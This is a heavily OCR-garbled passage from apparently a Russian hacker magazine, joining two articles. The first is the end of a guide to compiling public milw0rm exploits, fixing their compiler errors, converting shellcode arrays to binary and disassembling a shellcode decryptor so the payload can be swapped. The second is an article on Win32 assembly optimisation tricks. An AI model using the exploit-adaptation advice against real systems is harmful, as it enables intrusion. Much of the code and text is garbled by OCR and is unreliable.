же ее нет — смотрим на следующее: 

• присутствуют директивы в стиле «изе ІО:: 
Зоскеі;»; 

• точка с запятой ставится в конце каждой стро- 
ки; 

• тело функций и многострочечных циклов/опе- 
раторов іі заключено в фигурные скобки; 

• отступ внутри тела роли не играет и часто от- 
сутствует. 

• многострочечные строковые константы соеди- 
няются через точку. 

Выполнение всех этих условий свидетельствует 
о том, что перед нами РегІ. Язык РуіИоп внешне 
похож на него, но содержит ряд принципиаль- 
ных отличий (и обычно предваряется строкой 
«#!/изг/Ып/руШоп», которой, впрочем, может и 
не быть): 

• присутствуют директивы в стиле «ітрогі 
зоскеі», «ітрогізуз»; 

• точка с запятой в конце строки не ставится; 

• тело функций и многострочечных циклов опе- 
раторов іі не берется в скобки; 

• отступ внутри тела функций, оператор \і и цик- 
лов строго обязателен; 

• многострочечные строковые константы соеди- 
няются, как в Си («<ЕІ\ІТЕВ>»). 

Выполнение всех этих условий — верный при- 
знак Питона, который, как и РегІ, портирован на 
множество платформ и распространяется на 
бесплатной основе. 

Проблемы вызывает комплект поставки. Доста- 
точно часто хакеры выкладывают не весь ехріоіі, 
а только его часть, и транслятор начинает ма- 
териться на отсутствующие включаемые фай- 
лы/библиотеки. Такие ехріоіі'ы следует сразу 
отправлять в топку, хотя при наличии большого 
количества свободного времени и некоторого 
опыта работы с языком недостающие файлы 
можно (теоретически) воссоздать и самостоя- 



тельно. Но зачем?! 

Исключение составляют листинги, содер- 
жащие в себе строку «ТИіз ТМе із рагі оі іТіе 
Меіазріоіі Ргатеѵѵогк» и являющиеся модулями 
Ргатеѵѵогк'а, без которого они, естественно, не 
запускаются. Присутствие такой строки необя- 
зательно, но сама структура модуля настолько 
характерна, что, увидев такую штуку один- 
единственный раз, будешь распознавать ее 
всегда. Например: тіІѵѵОгт.сот/ехрІоіІз/1 788. 

С диалектами Си/Си++ все намного сложнее. 
Очень часто случается так, что программу, напи- 
санную под один компилятор, не удается (без пе- 
ределок) откомпилировать ничем другим. Пос- 
ледняя версия компилятора далеко не всегда 
оказывается самой лучшей. В особенности это 
касается дсс, в ядро которого вносится большое 
количество изменений, зачастую не без ущерба 
для скорости и обратной совместимости. 
Первым делом необходимо определить: при- 
плюснутый это Си или классический? Вотхарак- 
терные черты приплюснутого: 

• объявление переменных по месту использова- 
ния, а не в начале функции; 

• наличие таких ключевых слов, как «класс» и 
двух двоеточий «::»; 

• использование пеѵѵ для выделения памяти или 
явное преобразование типа перед таІІос() 

• отсутствует ргіпф а весь ввод/вывод осущест- 
вляется операторами ««» и «>>». 

Если хоть одно из этих условий выполняется, то 
программа явно написана на приплюснутом Си, 
в противном случае используется классичес- 
кий. Кстати говоря, Си/Си++ отличается от регІ/ 
руібоп своими директивами «#іпсІисІе» и еще 
тем, что символ «#» в нем никогда не использу- 
ется для оформления комментариев. 

В отличие от интерпретируемых языков, библи- 
отеки которых более или менее стандартизиро- 
ваны, Си-компиляторы включают в себя большое 
количество системно-зависимых библиотек, в 
результате чего программа может вызывать фун- 
кции, отсутствующие в нашем трансляторе, или 
использовать специфические особенности конк- 
ретной версии языка. В первую очередь, это каса- 
ется сырых сокетов (по-разному реализованных 



в І_іпих и *ВЗО) и прочих системно-зависимых 
фичей. Некоторые ехріоіі'ы пишутся в расчете 
на ѴѴіпбоѵѵз и вместо «общепринятых» функций 
типа Іореп()ДсІозе() используют громоздкие 
АРІ-вызовы СгеаІеРіІе/СІозеНапбІе. Откомпи- 
лировать такой ехріоіі можно и под *піх'ом, но 
для этого придется заменять АРІ-вызовы на 
соответствующие им Си-функции или зузсаІГы. 
Самое неприятное состоит в том, что у МісгозоД 
имеется свой собственный, особый взгляд на 
интерфейс сокетов, и для переноса ѴѴіпбоѵѵз- 
кода, работающего с сокетами, под *піх прихо- 
дится искать альтернативный *піх-ехрІоі1;. Фор- 
мальным признаком форточной природы кода 
является наличие функции ѴѴЗАЗіагШр, кото- 
рая в *піх-подобных системах и не ночевала. Но 
классический Си — это только цветочки. Самое 
страшное, как всегда, впереди. 

Приплюснутый Си — это настоящий кошмар. 
Компиляторы (и поставляемые вместе с ними 
библиотеки) различаются просто колоссаль- 
но! Приходится иметь в своем распоряжении 
целую артиллерию дсс различных версий, а в 
рукавахдержатьвсякуюэкзотикутипаіпіеі С++, 
но и тогда будут встречаться программы, кото- 
рые упорно не хотят компилироваться ! 

Яркий тому пример — тіІѵѵОгт.сот/зИеІІ- 
собе/656 (прилагается к статье под именем 
Ьеіа.срр). Пропускаем его через дсс и полу- 
чаем следующий список ошибок (не считая 
варнингов): 

Список ошибок, выдаваемый компилятором дсс. при 
попытке трансляции файла Ьеіа.срр 

ЬеІа.срр:34:21 : ѵѵіпсіоѵѵз.іп: N 0 зисб Іііе ог сіігесіогу 
Ьеіа.срр: Іп !ипсііоп 'іпі таіп(іп1:, сГіаг**, сГіаг**) 1 : 
ЬеІа.срр:165: еггог: 'зкістр 1 ипсіесіагесі Дігзі изе ІГііз 
кіпсііоп) 

Ьеіа.срр:185: еггог: 'зігпістр' ипсіесіагесі Дігзі изе іГііз 
кіпсііоп) 

Ьеіа.срр:245: еггог: 'ізаіпит' ипсіесіагесі Дігзі изе іГііз 
кіпсііоп) 

Ьеіа.срр:250: еггог: 'ізргіпі' ипсіесіагесі Дігзі изе ІГііз 
кіпсііоп) 

ЬеІа.срр:339: еггог: іпѵаіісі сопѵегзіоп кот 'ѵоісГ Іо 
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'сбаг*' 

Ьеіа.срр:356: еггог: '0_В1ЫАРУ ипсіесіагесі (Іігзі изе Шіз 
Іипсііоп) 

Ьеіа.срр:361: еггог: 'Ізеек 1 ипсіесіагесі (Іігзі изе ІГііз 

Іипсііоп) 

ЬеІа.срр:377: еггог: іпѵаіісі сопѵегзіоп Ігот 'ѵоісі* 1 Іо 

'сбаг* 1 

ЬеІа.срр:384: еггог: 'геасГ ипсіесіагесі (Тігзі: изе іИіз 

Іипсііоп) 

ЬеІа.срр:398: еггог: 'сіозе 1 ипсіесіагесі (Тігзі изе іТііз 

Іипсііоп) 




Попытка компиляции сЬайла Ьеіа. соо и результат 



С ошибкой 34 все понятно — программаусилен- 
но косит под форточки, прихватив с собой файл 
<ѵѵіпсІо\л/з.б>, но тут же использует стандарт- 
ные РОЗІХ-вызовы: ореп() со странным флагом 
0_ВІІ\ІАВѴ, Ізеек(), геаб() и сІозе(), которых ни в 
самом ѴѴіпбоѵѵз, ни в одном из \л/іп32-компиля- 
торов никогда не существовало (см. ошибки 
356, 361, 384 и 398). Убираем строку «#іпсІибе 
<ѵѵіпсІо\л/з.б> » , меняя ее на «#іпсІибе сипізісі. 
6>» , и удаляем глупый флаг 0_ВІІ\І АВУ, посколь- 
ку по умолчанию файл уже является двоичным 
(узнать, какие заголовочные файлы соответс- 
твуют данной функции, можно из тап'а, напри- 
мер, «тап 2ореп»). Чтобы избавиться от пре- 
дупреждения «ібіз Тііе іпсіибе <таІІос.6> ѵѵбісб 
із бергесаіеб, изе <з1сШЬ.6> іпзіеаб», удаляем и 
«#іпсІибе <таІІос.6>». 

Ошибки 245 и 250 устраняются подключением 
их «родного» заголовочного файла, в кото- 
ром они были объявлены «#іпсІисІе <сІуре.6>» 
(см. «тап ізаіпит»). А вот функций з1гістр() 
и зІгпістрО в дсс действительно нет, однако 
они могут быть заменены на аналогичные им 
зІгстр() и зІгпстрО даже без коррекции ар- 
гументов! 

Ошибки 339 и 377 исправляются еще проще: 
достаточно взять строку «ЬиТТег = таІІос(МАХ_ 
ВЕІЕРЕР05І2Е)» и добавить явное преобразо- 
вание типов, также называемое кастингом 
«ЬиІІег = (сбаг *)таІІос(МАХ_ВІІРРЕР{_ЗІ2Е)». 
Исправленный вариантлежитв файле Ьеіа-Ііхеб. 
срр и компилируется без всяких нареканий. 
Будем считать, что с идентификацией трансля- 
тора мы разобрались, и ехріоіі откомпилировал- 
ся нормально, но... это еще не конец, а только 
начало. Ведь программный листинг — это толь- 
ко оболочка, образно говоря, «тетива», а ра- 
зящее острие — загадочный и таинственный 
збеІІ-код, помещенный в строковый «иерогли- 
фический» массив вроде «\х29\хс9\х83...\хе9\ 
хЬ0\хб9». Что делать, если он не работает или 
работает не так, как нам этого хочется? 

Доработка напильником 

ЗИеІІ-код имеет сложную структуру и обыч- 
но состоит из нескольких частей. РІапример, 
ехріоіі тіІѵуОгт.сот/ехрІоіІз/1075 . приложен- 
ный в файле 1075. с, использует целых 6 «ие- 
роглифических» массивов: бсе_грс_беасІег1 , 
Іад_ргіѵаІе, бсе_грс_6еасІег2, бсе_грс_6еасІегЗ, 
оіізеіз, ЬіпсІ_збеІІсосІе. Первые пять — это слу- 
жебные структуры, атакующие жертву, срываю- 
щие буферу крышу и передающие управление 
на ЬіпсІ_збеІІсосІе. Последний представляет 



собой «чистый» збеІІ-код, который может быть 
беспрепятственно заменен любым другим. На 
самом деле, тут все не так просто, и произво- 
ла хоть отбавляй. Как минимум, необходимо 
убедиться, что мы используем збеІІ-код, сов- 
местимый с атакуемой системой, и точки вхо- 
да у них совпадают. Часто (но не всегда) точка 
входа расположена в самом начале збеІІ-кода, 
реже — в конце или в середине. Г ораздо хуже, 
если ехріоіі: написан «пионером», и все блоки 
идут одним большим кусом, внутри которого 
присутствует и збеІІ-код. 

Чтобы определить положение дел, необходи- 
мо преобразовать «иероглифический» текст 
в двоичный файл и дизассемблировать его. 
Разыскивать соответствующий конвертор со- 
вершенно не обязательно. Проще переложить 
эту задачу на плечи компилятору Си, написав 
простенькую программку из нескольких строк. 

Простейший конвертор для преобразования строко- 
вых констант в двоичный код 

#іпсІисІе <зісііо.іп> 

іпі таіп(ѵоісі) 

{ 

РНЕ Ч; 

іі (1 = 1ореп("5ІпеІІсосІе", "ѵѵЬ")) 

1\л/гіІе(зИеІІсосІе, зігеоіфбеіісосіе), 1 , 1); 

ехі1(0); 

} 



Сам збеІІ-код должен быть размещен в мас- 
сиве, объявленном как «сбаг збеІІсосІе[]» (см. 
прилагаемый файл 6ех2Ьіп.с) и приведенным 
к синтаксису Си (то есть, если збеІІ-код выдер- 
нут из регГа, необходимо удалить точки в конце 
строковых констант). Компилируем наш имп- 
ровизированный конвертор, запускаем его на 
выполнение — и тут же на диске образуется 
файл «збеіісобе», который можно загрузить в 
НТЕ, ЮА Рго или любой другой дизассемблер 
по вкусу, не забывая, конечно, переключить его 
в 32-битный режим. 

В данном случае мы получим следующий код: 

Первые 1 6 байт зГіеІІ-кода содержат осмысленный код 
расшифровщика 

0000: 29С9 зиЬ есх.есх 

0002: 83Е9В0 зиЬ есх,-050 ;"Р" 



0005: Э9ЕЕ 
0007: 097424Р4 
000В: 5В 

000С:81 731 31 9Р50437 
00000013: 83ЕВРС 
00000016: Е2Р4 



ЙСІ2 

Ізіепѵ [езр][-000С] 
рореЬх 

хог б , [еЬх] [000 1 3] , 03704Р5 1 9 
зиЬеЬх,-004; И ?" 

Іоор 000С(1) 



Ага! Вполне типичный расшифровщик. Значит, 
точка входа в збеІІ-код действительно находится 
в начале массива, и он может быть беспрепятс- 
твенно заменен любым таким же. Если же вмес- 
то осмысленного кода нас встречает мусор, то 
нужно последовательно отступать на один байт 
до тех пор, пока мы не получим что-то удобова- 
римое. Естественно, для этого необходимо знать 
ассемблер и хотя бы в общих чертах представ- 
лять себе устройство операционной системы. 
Правильно спроектированный збеІІ-код работа- 
ет на всех версиях операционных систем, для 
которых он предназначен, однако в последнее 
время все чаще и чаще приходится сталкиваться 
с «пионерством», которое привязано к фикси- 
рованным адресам и функционирует только 
под определенной сборкой Ыпих-ядра или за- 
ранее заданным сервис-паком, наложенным на 
ѴѴіпбоѵѵз. 

*піх-подобные системы в этом плане менее из- 
менчивы, и проблема «фиксированных адре- 
сов» здесь практически сведена на нет. Обычно 
збеІІ-код вызывает необходимые ему функции 
через системные вызовы, интерфейс с которы- 
ми обеспечивается прерыванием ІІ\ІТ 806 или 
дальним вызовом по адресу 00076:000000006, 
что позволяет збеІІ-коду функционировать под 
всей линейкой осей, для которыхон предназна- 
чен. Тем не менее, определенные системные 
вызовы в различных версиях ядер реализова- 
ны неодинаково, что порождает проблемы сов- 
местимости. К счастью, базовый набор систем- 
ных вызовов остается единым для всех осей, и 
грамотно спроектированный ехріоіі: поражает 
как І_іпих, таки ВЗО. 

Заключение 

Последние версии *піх'ов оснащены довольно 
мощными защитными механизмами: неиспол- 
няемым стеком, рандомизатором адресного 
пространства и т.д. Обычным ехріоіі'ом такую 
штуку уже не пробить, а потому техника 
написания збеІІ-кодов в ближайшем будущем 
обещает круто измениться, но прежде чем 
бросаться на неисполняемый стек, необходи- 
мо разобраться в существующих ехріоіі'ах, что 
мы сейчас и попытались сделать, □: 
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Экстремальная 

оптимизация 



Хитрости низкоуровневого программинга для самых маленьких 



I 




уть начинающего ассемблерщика не только долог, но еще и 
тернист. Повсюду торчат острые шипы, дорогу прегражда- 
ют разломы, ловушки и капканы. В темной чаще горят злые 
глаза, доносятся какие-то ухающие звуки. Разные неблагоприятные 
факторы нагнетают мрачную атмосферу и серьезно затрудняют про- 
движение вперед. Большинство учебников затрагивают только МЗ- 
003, крайне поверхностно описывая практические проблемы про- 
граммирования под ѴѴіпбоѵѵз. Я решил это исправить и поделиться с 
читателями рецептами, которые известны любому профессионалу, но 
совершенно неочевидны новичку. 

Шотовые функции на блюдечке 

Грань между плюсами «мышиного» и «рукописного» кода очень тон- 
ка. Отклонение в одну сторону снижает продуктивность программы, 
в другую — увеличивает время разработки. Короче, не будем разво- 
дить демагогию, а рассмотрим фрагмент кода, запускающий процесс 
на выполнение стандартным способом через \/ѵіп32 АРІ-функцию 
СгеаІеРгосезз: 



хогеах, еах 


еах := 0 


ризГі оНееІ рі 


ІрРгосеззІп!огтаІіоп 


ризГі оГСзеІзіз 


ІрЗіагІирІИо 


ризГі еах 


ІрСиггепЮігесІогу 


ризГі еах 


ІрЕпѵігоптепІ; 


ризГі еах 


сІѵѵСгеаііопРІадз 


ризГі еах 


ЫпГіегііНапсІІез 


ризИ еах 


ІрТГігеасІАЩгіЬи^ез 



ризГі еах 


ІрРгосеззАіІгіЬиІез 


ризГі оГзеі Ше_пате 


имя исполняемого файла с аргументами 


ризГі еах 


ІрАррІісаііопІЧате 


саІІ сІз:[СгеаІеРгосез5] 


косвенный вызов АРІ-функции через ІАТ 


Ассемблированный код занимает 1РН байт и еще 54Н байта расхо- 
дуется на структуры РВОСЕЗЗ_ІІ\ІРОВМАТЮІ\І и ЗТАВТІІРІІМРО плюс 
длина имени файла. А вот что получится, если воспользоваться мо- 
рально «устаревшей» функцией ѴѴіпЕхес, доставшийся в наследство 
от 16-разрядной старушки ѴѴіпбоѵѵз? Вопреки распространенному 
заблуждению, она реализована одновременно как 16- и 32-разряд- 
ная функция, а поэтому перехода в 16-разрядный режим при вызове 
ѴѴіпЕхес из 32-разрядного кода не происходит, а значит, не происхо- 
дит и падения производительности: 


ризГі ООН 


иСтсІЗГіоѵѵ (короче, чем ХОР ЕАХ,ЕАХ/РІІЗН ЕАХ) 


ризГі оГзеІ Й1е_пате 


имя исполняемого файла с аргументами 


саІІ сіз: [ѴѴіпЕхес] 


косвенный вызов АРІ-функции через ІАТ 



Всего три машинные команды, укладывающиеся в 1ЕИ байт (без уче- 
та имени файла), и никаких дополнительных структур! Расплатой за 
оптимизацию становится невозможность создания отладочных или 
«замороженных» процессов, не говоря уже про атрибуты безопас- 
ности и прочую хрень. Но это еще не предел оптимизации! Восполь- 
зовавшись функцией зузіет из библиотеки МЗѴСВТ.0І_1_, которая 
активно используется многими приложениями и практически всегда 
«болтается» в памяти, мы сократим код до ЮН байт или даже до 1АН, 
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если отсрочим восстановление стека, выполнив команду асісі езр, х в 
конце функции, выталкивая все аргументы одним махом: 

ризб о^зеі Я1е_пате ; имя исполняемого файла с аргументами 

саІІ зузіет ; прямой вызов функции (почему так — см. врезку) 

асісі езр, 4 ; выталкиваем аргументы из стека (можно сделать позже) 

То же самое относится и к функциям файлового ввода/вывода, преоб- 
разованиям данных и т. д. Никто же не будет спорить, что вызов Іореп 
намного короче, чем СгеаІеРіІе, а скорость исполнения у них прак- 
тически та же самая, тем более что библиотека М5ѴСВТ.ОІ_І_ всегда 
присутствует в памяти, поскольку используются системные процессы. 
ѴѴіпбоѵѵз просто спроецирует ее на наше адресное пространство — 
вот и все! Никакого увеличения потребляемой памяти не произойдет! 
Больше выиграть можно на задачах, требующих перевода двоичных 
данных в АЗСІІ-представление, или наоборот. Собственно говоря, про- 
граммирование на ассемблере и начинается с вывода на экран числа, 
заданного в двоичной форме. Конечно, «вручную» разработанная и 
оптимизированная функция намного быстрее стандартного зргіпФ Од- 
нако очень редко можно встретить программу, расходующую основное 
время на преобразование данных, поэтому использование библиотеч- 
ных функций сокращает размер и время разработки программы. 
Приведенный ниже пример распечатывает число, содержащееся в 
регистре ЕАХ в шестнадцатеричной, десятеричной и восьмеричной 
форме, автоматически дописывая ведущие нули, растягивающие 
число до 4-х разрядов. А теперь попробуй осуществить то же самое 
без использования библиотек и сравни размер полученного кода! 



Фрагмент программы, принимающий число в ЕАХ и выводящий его на 
экран в шестнадцатеричной, десятеричной и восьмеричной формах 

тоѵ еах, 6661п ; число, которое необходимо вывести на экран 



// переводим число в Гіех, бес и осі системы исчисления в АЗСІІ-представлении 


зиЬ езр, 606; резервируем память под буфер, куда пойдет результат 


тоѵеЬх, езр 


сохраняем указатель на буфер в регистре ЕВХ 


ризб еах 


і 


ризГі еах 


+ - передаем число для преобразования функции зргіпіі 


ризб еах 


1 


ризГі оИэеі з 


передаем в стек указатель на строку спецификаторов 


ризб еЬх 


передаем указатель на буфер для получения результата 


саіізргіпі! 


прямой вызов функции зргіпіі 



Д вывод преобразованных данных на экран через диалоговое окно 


хогеах.еах 


; еах : = 0 


ризГі еах 


; иТуре 


ризГі еах 


; ІрСарііоп 


ризГі еЬх 


; ІрТехі(наши преобразованные данные) 


ризб еах 


; ГіѴѴпб 


саІІ бз:[МеззадеВохА] 


; косвенный вызов АРІ-функции МеззадеВох 


абб езр, 606 + (5*4) 


; выталкиваем аргументы из стека и уничтожаем буфер 


... 


з 6Ь "%04Х Гіех == %04б бес == %04о осГ,0 ; строка спецификаторов 



Вызов АРІ-функций из ассемблерных вставок 

При вызове АРІ и ОІ_І_-функций из ассемблерных вставок возникает 
множество проблем, довольно туманно описанных в документации, 
прилагаемой к компилятору. Возьмем, к примеру, МісгозоІІ ѴізиаІ С++ 
и попробуем вызвать функцию (ЗеіѴегзіоп так, как будто мы сделали 
это на чистом ассемблере: 



азт { 




саІІ СеіѴегзіоп 


; прямой вызов АРІ-функции 



Компилируем файл с настройками по умолчанию и запускаем. Про- 
грамма тут же рушится. Почему? Смотрим в дизассемблере: 



іехІ:00401 000 Е8 РР 2Р 00 00 


саІІ пеаг ріг ОеіѴегзіоп 


... 


.ібаіа: 00404004 ???????? 


ехігп ОеіѴегзіоп:бѵѵогб ; ОѴѴОРО ОеіѴегзіоп(ѵоіб) 



Так вот где собака зарыта! Компилятор сгенерировал переход по адре- 
су, где расположено двойное слово, принадлежащее таблице импорта 
(секция .ібаіа) и содержащее указатель на АРІ-функцию ОеіѴегзіоп. 



Неудивительно, что попытка интерпретации таблицы импорта, как ис- 
полняемого кода, приводит к краху, и, чтобы программа заработала 
правильно, необходимо использовать косвенную адресацию, заклю- 



чив имя функции в квадратные скобки и выставив перед ними знак 
префикса сз: или бз:. Правильный код выглядит так: 



азт{ 




саІІ бз:[ОеіѴегзіоп] 


; косвенный вызов АРІ-функции 



I 



При вызове функций, представленных в двух вариантах — АЗСІІ и 
ІІМССЮЕ, — мы можем указывать суффиксы А и ѴѴ явно, а можем 
использовать «каноническое» имя функции без суффиксов, и тогда 
компилятор самостоятельно выберет нужный вариант (в зависимости 
от настроек по умолчанию или ключей компиляции). Вот косвенный 
вызов функции СгеаіеРгосезз без указания суффиксов, предостав- 
ляющий компилятору свободу выбора одного из двух вариантов: 

азт{ 

; тут мы передаем аргументы 

саІІ бз:[Сгеа1:еРгосеззѴѴ]; косвенный вызов функции с суффиксом ѴѴ 



А вот его дизассемблерный листинг. Вызывается именно та функция, 
которая была указана: 



іехІ:0040101Е 


бЬЗЕб ; бз: 


іехІ:0040101Е 


саІІ СгеаІеРгосеззѴѴ ; запуск ІЛЧІССЮЕ-версии функции 



А теперь — косвенный вызов функции СгеаІеРгосезз без указания 
суффиксов, предоставляющий компилятору свободу выбора одного 
из двух вариантов: 

азт{ 

; тут мы передаем аргументы ... 

саІІ бз:[СгеаІеРгосезз] ; косвенный вызов функции без суффиксов 

Ну что же, компилятор выбрал АЗСІІ-вариант, что соответствует его 
настройкам по умолчанию: 



Тех!: 00401 01 Е 


бЬЗЕГі ; бз: 


Тех!: 00401 01 Е 


саІІ СгеаІеРгосеззА ; запуск АЗСІІ-версии функции 



При вызове функций типа зузіет квадратные скобки ставить уже 
нельзя! Функция зузіет является частью библиотеки времени ис- 
полнения (РГП_ — Вип Тіте ЫЬгагу), линкуемой статическим образом, 
поэтому саІІ зузіет сработает, как и ожидалось, а вот саІІ бз:[зузІет] 
передаст управление по адресу 83ЕС8В55Н, попытавшись проинтер- 
претировать начало функции зузГет как указатель: 

Тех!: 0040 100В ЗЕ РР 1 5 1 А 1 0 40 00 саІІ сіѵѵогсі ріг зузіет 



; косвенный вызов статически линкуемой функции 




; приводит к тому, что первые 4 байта функции 




; интерпретируются как указатель, и управление передается по адресу 83ЕС8В55Гі 


■ 


,1ехі:00401018 


зузіет ргос пеаг ; начало 


функции зузіет 


іехІ:00401018 55 


ризГі еЬр 




іехІ:00401019 8ВЕС 


тоѵеЬр, езр 




іехІ:0040101В83ЕС10 


зиЬезр, ЮГі 




іехІ:0040101Е56 


ризб езі 





Таким образом, при вызове функций из ассемблерных вставок всегда 
следует учитывать специфику конкретной вызываемой функции, не 
надеясь на то, что компилятор сделает это за нас. 

При программировании на чистом ассемблере подобная проблема не 
возникает, поскольку имена и типы вызовов функций всегда объявля- 
ются вручную (или через включаемые файлы), и мы заранее знаем, 
как именно интерпретирует их транслятор. При работе с ассемблер- 
ными вставками подобной уверенности у нас нет. В частности, если 
компилятор решил использовать инкрементную линковку, то имя 
функции интерпретируется уже не как указатель на двойное слово из 
таблицы импорта, а как указатель на «переходник», представляющий 
собой ітр [рРітс], то есть нам квадратные скобки не нужны! 
Инкрементная линковка обычно включается в режиме оптимизации, 
а в отладочном варианте отсутствует. Сюрприз, да? При изменении 
ключей компиляции ассемблерные вставки изменяют свое поведе- 
ние, причем безо всякого предупреждения! 
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ссюто 




Содержимое стека на момент вызова функции \ на древней ХТ, снабженной 8086 



процессором. В отладчике хорошо видно, что в стек попадает уже уменьшенное 
значение регистра 5Р, в результате чего указатель *х указывает сам на сёбя!^[ 




Короче говоря, внешние функции из ассемблерных вставок лучше 
не вызывать, а если и вызывать, то очень осторожно. 

Выделение памяти на стеке 

На процессорах 8086/8088 существовала замечательная возмож- 
ность — затолкать в стек аргумент-указатель с одновременным выде- 
лением памяти всего одной (!) однобайтовой (!) машинной командой 
РІІ8Н Е8Р, которая сначала уменьшала значение Е8Р, а только потом 
заталкивала его в стек. То есть в стек попадало уже уменьшенное 
значение Е8Р, что способствовало трюкачеству. 

Рассмотрим конкретный пример — функцию, одним из аргументов 
которой является указатель на переменную, принимающую возвра- 
щаемый результат: Т(іпІ а, ѵѵогсі *х). Предельно компактный вызов (на 
8086!) выглядел так: 



ризб зр 


; передаем указатель на х с одновременным выделением памяти 


ризб зі 


; передаем переменную а 


саІІ і 


; зовем функцию 



Подвох в том, что переменная х возвращается к ячейке памяти, вы- 
деленной РІІ8Н 8Р! То есть указатель на х указывает сам на себя, 
что хорошо видно в отладчике (см. рис). 

Начиная с 80286, логика работы инструкции РІІ8Н Е8Р предатель- 
ским образом изменилась, и теперь процессор помещает в стек та- 
кое значение регистра Е8Р, каким оно было до модификации (кстати, 
псевдокод команды РІІ8Н, приведенный в руководстве Іпіеі, содер- 
жит ошибку, из которой следует, что в стек помещается уменьшенное 
значение Е8Р, хотя на практике это не так!). 

И пока программисты спорят, какое из двух решений идеологически 
более правильное, прежний код отказывается работать, потому что 
команда РІІ8Н Е8Р вместо указателя, указывающего на себя, те- 
перь заталкивает в стек указатель на следующее двойное слово! 
Поэтому при переходе с 8086 на 286+ приходится добавлять «лишнюю» 
команду РІІ8Н ЕАХ, резервирующую ячейку на стеке, на которую будет 
указывать значение Е8Р, засланное в стек инструкцией РІІ8Н Е8Р: 



ризГі еах 


; выделяем память под переменную х (регистр может быть любым) 


ризГі езр 


; передаем указатель на х как аргумент функции 1 



ризГі езі 


; передаем переменную а 


саІІ і 


; зовем і 



Несмотря на то, что 8086/8088 процессоры уже давно не встреча- 
ются в дикой природе (ну разве что в виде эмуляторов), многие про- 
граммы, написанные под них, актуальны и сегодня. Это касается как 
уже откомпилированного машинного кода, так и различных ассем- 
блерных библиотек, переносимых под современные процессоры. 
Одна из причин, по которой они могут не работать, — это различие 
в логике обработки команды РІІ8Н Е8Р. 

Вообще же, динамическое выделение памяти посредством 
РІІ8Н + фиктивный регистр — вполне законный прием, которым 
пользуются не только люди, но и компиляторы. Это намного компак- 
тнее, чем обращение к локальным/глобальным переменным, выде- 



ляемым классическим способом. 

Естественно, большие объемы памяти лучше всего выделять с помощью 
811В Е8Р, ХХбі, но при этом следует помнить, как минимум, о двух вещах. 
Первое и главное — ѴѴіпбоѵѵз-системы выделяют стековую память ди- 
намически, используя для этого специальную «сторожевую» страницу 
памяти (раде диагсі). Как только к ней происходит обращение, система 
выделяет еще одну или несколько страниц памяти, перемещая стороже- 
вую страницу наверх (в сторону меньших адресов памяти). При последо- 
вательном «росте» стека все работает нормально, но, если попытаться 
прыгнуть за сторожевую страницу, сразу же возникнет непредвиденное 
исключение (ведь никакой памяти по данному адресу еще нет) — и ра- 
бота программы завершится в аварийном режиме. То есть, если у нас 
есть, к примеру, 1 Мб стекового пространства, то это еще не значит, что 
код 811В Е8Р, ІООООб/МОѴ [Е8Р],ЕАХ будет работать. Тут уж как повезет 
(или не повезет). Если ранее вызываемые функции выделяли стековую 
память планомерно, задвинув сторожевую страницу куда-то вглубь сте- 
кового пространства, то какие-то шансы у нас есть, но полагаться на 
них не стоит. Поэтому при выделении под локальные переменные более 
4-х Кб необходимо выполнить цикл, последовательно обращающийся 
хотя бы к одной ячейке каждой из запрашиваемых страниц. Читать все 
ячейки необязательно, да и непроизводительно. 

Компиляторы делают это автоматически, а вот многие ассеблерщики 
о таком коварстве ѴѴіпбоѵѵз зачастую даже и не подозревают, а потом 
упорно ищут бага в своей программе, не понимая, почему она не ра- 
ботает! Вот пример программы на Си, выделяющей 1 Мб памяти под 
локальные переменные и обращающейся к самой «дальней» ячейке: 



таіп() 

I 


сИаг х[ 1024* 1024]; 


//выделяем 1 Мб стековой памяти 


геіигп *х; //обращаемся к наиболее «дальней» стековой ячейке 


1 






. іехі: 00401 000 _ 


.таіп ргос пеаг 




Тех!: 0040 1000 




тоѵ еах, 1000006 


.!ех!:00401005 




саІІ аІІоса_ргоЬе 


.!ех!:0040100А 




тоѵзх еах, Ьуіе ріг [езр] 


.!ех!:00401012 




асісі езр, 1000006 


.!ех!:00401018 




геіп 


.!ех!:00401018_ 


.таіп 


епф 


■ 


.!ех!:00401020_ 


__аІІоса_ргоЬе 


ргос пеаг 


.!ех!:00401020 


.!ех!:00401020 


агд_0 = бѵѵогсі ріг 8 


.!ех!:00401020 


.!ех!:00401020 




ризб есх 


.!ех!:00401021 




стр еах, 10006 


.!ех!:00401026 




Іеаесх, [езр+агд_0] 


.!ех!:0040102А 




\Ь збогі Іос_401 040 


.!ех!:0040102С 


.!ех!:0040102С 


Іос_40102С: 


.!ех!:0040102С 




зиЬ есх, 10006 
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В стек попадаеттакое значение регистра Е5Р, каким 
Іоно было до модификации, в результате чего указа- 
|тель *х указывает на следующее двойное словоІ^Д 



,іехі:00401032 


зиЬ еах, ЮООН 


ТехТОСИОІ 037 


Іезі [есх], еах 


.іехі:00401039 


стр еах, 1000Н 


,іехі:0040103Е 


гУ 

сг 

ІГ 

о 

о 

о 

-1^ 

о 


Тех!: 00401 040 


1ехі:00401040 


Іос_401040: 


Тех!: 00401 040 


зиЬ есх, еах 


1ехі:00401042 


тоѵ еах, езр 


Лехі: 00401 044 


іезі [есх], еах 


Тех!: 00401 046 


тоѵ езр, есх 


1ехі:00401048 


тоѵ есх, [еах] 


Тех!: 00401 04А 


тоѵ еах, [еах+4] 


Техі: 0040 1040 


ризН еах 


Лехі: 00401 04Е 


геЩ 


. іехі : 00401 04 Е_ 


_аІІоса_ргоЬе епсір 



Но коварство ѴѴіпсІоѵѵз на этом нѳ заканчивается. Многие АРІ- 
функции неявно закладываются на выравнивание стека, и, если 
нам, к примеру, требуется ровно 69Н байт стековой памяти, ни 
в коем случае нельзя писать 511В ЕЗР,69Ь, а то все рухнет! 
Следует округлить 69И по границе двойного слова и запросить 
6СИ байт или... между актами выделения/освобождения памяти 
не вызывать никаких АРІ-функций. Часто, в погоне за оптимиза- 
цией, программисты, борющиеся за каждый байт памяти, забы- 
вают о выравнивании и часами ищут причину, по которой опти- 
мизированный вариант программы отказывается работать. 




Заключение 

Системное программирование хранит множество секретов, за- 
гадок и тайн, постепенно становясь уделом небольшой горстки 
профессионалов, в то время как мир дружно сходит с ума, подса- 
живаясь на языки высокого уровня. Об ассемблере вспоминают 
только тогда, когда требуется что-то очень сильно нестандартное, 
с чем компилятор уже не справляется или сгенерированный им 
код не отвечает требованиям производительности. 

Вот тут-то и выясняется, что специалистов, владеющих ассем- 
блерами, практически нет, а те, что есть, уже утратили свои 
навыки и оптимизируют намного хуже компиляторов, разработ- 
чики которых за последние несколько лет сделали качествен- 
